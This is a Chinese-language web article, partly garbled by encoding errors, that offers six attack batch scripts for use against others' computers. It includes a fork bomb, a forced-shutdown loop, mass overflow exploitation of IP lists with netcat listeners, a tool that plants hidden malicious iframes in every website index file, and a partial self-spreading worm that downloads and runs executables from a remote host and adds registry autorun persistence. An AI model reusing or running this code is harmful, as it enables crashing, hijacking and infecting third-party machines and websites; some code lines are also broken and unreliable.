第一個(gè):讓別人內(nèi)存OVER(逼他重啟)
@echo off
start cmd
%0

就這3行了


第二個(gè):讓對(duì)方重啟指定次數(shù)(害人專用)
@echo off
if not exist c:\1.txt echo. >c:\1.txt & goto err1
if not exist c:\2.txt echo. >c:\2.txt & goto err1
if not exist c:\3.txt echo. >c:\3.txt & goto err1
if not exist c:\4.txt echo. >c:\4.txt & goto err1
if not exist c:\5.txt echo. >c:\5.txt & goto err1
goto err2
:err1
shutdown -s -t 0
:err2
上面可以讓對(duì)方電腦重啟5次后不在重啟


第三個(gè):自動(dòng)踢人(3389肉機(jī)保護(hù)自己專用)
@echo off
logoff 1
del log.bat
logoff后面的1改成自己登陸的ID號(hào),用query user查看


第四個(gè): 批量自動(dòng)溢出
@for /f %%i in (result.txt) do 42 %%i 58.44.89.158 521
先自己用NC監(jiān)聽端口,多開幾個(gè),然后指行,就自動(dòng)溢出了



第五個(gè):自動(dòng)掛馬改主頁(yè)
@echo off
cls
rem 直接打批處理名字就有幫助
title 批量掛馬,改首頁(yè)(傷腦筋 QQ:447228437).
color A
set pan=%1
set ye=%2
set dai=%3
if "%pan%"=="" goto e1
if "%ye%"=="" goto e1
if "趇%"=="" goto e1
if "趇%"=="htm.txt" goto u1
forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE echo ^<iframe src="http://趇%" width="0" height="0" frameborder="0"^> >>@path"
echo.
echo 代碼全部插入完畢!!!!
echo.
pause
goto e1
:u1
echo 您現(xiàn)在的操作將使%pan%盤下,全部名為%ye%的內(nèi)容變?yōu)槟牡膬?nèi)容.
echo 這將是非常危險(xiǎn)的,您真的要這樣做? 回車卻認(rèn),Ctrl c取消操作.
pause
forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE copy %1\htm.txt @path /y"
echo.
echo首頁(yè)全部更改完必!!!!如果您發(fā)現(xiàn)沒有替換成功,請(qǐng)將%ye%文件只讀屬性去掉.
echo.
pause
:e1
echo.
echo 本批處理只適用于2003系統(tǒng),其他系統(tǒng)要使用,請(qǐng)將forfiles.exe拷貝至系統(tǒng)盤system32目錄下
echo 用法:snj ^<搜索盤符^> ^<文件名^> ^<網(wǎng)馬地址^>
echo 例子:snj d:\ index.asp www.muma.com/mm.htm
echo 批處理將自動(dòng)添加^<iframe^>標(biāo)記
echo.
echo 如果您要更改全部網(wǎng)站的首頁(yè)!請(qǐng)?jiān)谂幚砦募谀夸浵?新建一個(gè)名為htm.txt的文本文件.
echo 然后將要更改的代碼加COPY到里面保存.然后將命令的^<網(wǎng)馬地址^>項(xiàng)輸入為htm.txt即可.
echo 例子:snj d:\ index.asp htm.txt
echo.
echo 為了能準(zhǔn)確無(wú)誤執(zhí)行批處理請(qǐng)最好先把記事本的"自動(dòng)換行功能去掉",讓命令保持在一行才能正確執(zhí)行.
echo.
echo 使用此批處理造成一切后果本人概不負(fù)責(zé),請(qǐng)大家謹(jǐn)慎使用!
echo.



第六個(gè):利用批處理編寫利用系統(tǒng)漏洞傳播的蠕蟲病毒
本來想寫完后在做教程,要去學(xué)校了,所以先把思路告訴大家,大家可以先自己寫寫,我有時(shí)間寫完發(fā)到群里.
這些是我未完成的批處理,大家可以在此基礎(chǔ)上按照我下面說的思路繼續(xù)寫完
del c:\42.exe
del c:\nc.exe
del c:\ip.exe
echo dim wsh > %systemroot%\help\test.vbs
echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test.vbs
echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810 < %systemroot%\help\or.txt",0 >> %systemroot%\help\test.vbs
echo dim wsh > %systemroot%\help\test2.vbs
echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test2.vbs
echo wsh.run "cmd /c start %systemroot%\help\good.bat",0 >> %systemroot%\help\test2.vbs
echo open 10.0.0.5 > %systemroot%\help\ftp.txt
echo open myyes >> %systemroot%\help\ftp.txt
echo 1 >> %systemroot%\help\ftp.txt
echo binary >> %systemroot%\help\ftp.txt
echo get 42.exe c:\42.exe >> %systemroot%\help\ftp.txt
echo get nc.exe c:\nc.exe >> %systemroot%\help\ftp.txt
echo get ip.exe c:\ip.exe >> %systemroot%\help\ftp.txt
echo bye >> %systemroot%\help\ftp.txt
echo echo Set xPost = CreateObject("Microsoft.XMLHTTP") ^>1.vbs > %systemroot%\help\or.txt
echo echo xPost.Open "GET","http://10.0.0.5/my.exe&quo...,0 ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo xPost.Send() ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo Set sGet = CreateObject("ADODB.Stream") ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.Mode = 3 ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.Type = 1 ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.Write(xPost.responseBody) ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.SaveToFile "d:\my.exe",2 ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo 1.vbs ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo my.exe ^>^>1.vbs >> %systemroot%\help\or.txt
echo Windows Registry Editor Version 5.00 > %systemroot%\help\1.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %systemroot%\help\1.reg
echo "SKYNET Personal FireWall"="F:\\系統(tǒng)安全工具\(yùn)\FireWall\\PFW.exe" >> %systemroot%\help\1.reg
echo "1"="%systemroot%\\help\\test2.vbs" >> %systemroot%\help\1.reg

if not exist %systemroot%\help\good.bat copy good.bat %systemroot%\help\good.bat & %systemroot%\help\test2.vbs & del good.bat
regedit -s %systemroot%\help\1.reg
ftp -s:%systemroot%\help\ftp.txt
move c:\nc.exe %systemroot%\help\ /y
move c:\42.exe %systemroot%\help\ /y
move c:\ip.exe %systemroot%\help\ /y
%systemroot%\help\test.vbs
rem for /f %%i in (result1.txt) do set a=%%i
rem for /f %%j in (result.txt) do 42 %a% %%j 810
準(zhǔn)備:
1:找一個(gè)反向連接的溢出攻擊程序,如ms06040漏洞
2:找呀一個(gè)免費(fèi)FTP空間,最好是送域名的
3:利用你所知道的高級(jí)語(yǔ)言編寫一個(gè),能生成隨機(jī)范圍IP地址和找到本機(jī)IP的工具.
思路:
用for語(yǔ)句對(duì)指定文本里的IP進(jìn)行溢出,然后用if語(yǔ)句判斷是否溢出成功, 如果成功開啟一個(gè)NC監(jiān)聽端口,NC后面帶一個(gè) < 輸入符號(hào)
輸入的內(nèi)容為下載本批處理文件,然后執(zhí)行這個(gè)批處理.這樣被溢出的機(jī)器就又會(huì)在他那里運(yùn)行我門的批處理,從而到自動(dòng)傳播的目的.

把批處理生成的文件集中放到一個(gè)目錄下,可以%systemroot%系統(tǒng)變量直接放到系統(tǒng)目錄下
因?yàn)榕幚磉\(yùn)行后會(huì)閃出命令行窗口,我門可以利用VBS腳本來運(yùn)行我們的批處理,這樣就不會(huì)有任何窗口出現(xiàn),腳本如下
echo dim wsh > %systemroot%\help\test.vbs
echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test.vbs
echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810 < %systemroot%\help\or.txt",0 >> %systemroot%\help\test.vbs

生成隨機(jī)IP工具的VB代碼
Private Sub Form_Load()
Dim fso As New FileSystemObject
Dim a, b, c, dAs Integer
Dim ph, e As String
ph = App.Path & "\" & "ip.txt"
Randomize
a = Int(253 * Rnd1)
b = Int(253 * Rnd1)
c = Int(240 * Rnd1)
Open ph For Output As #1
For i = c To c7
For j = 1 To 254
e = a & "." & b & "." & i & "." & j
Print #1, e
DoEvents
Next j
Next i
Close #1
Unload Me
End Sub

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。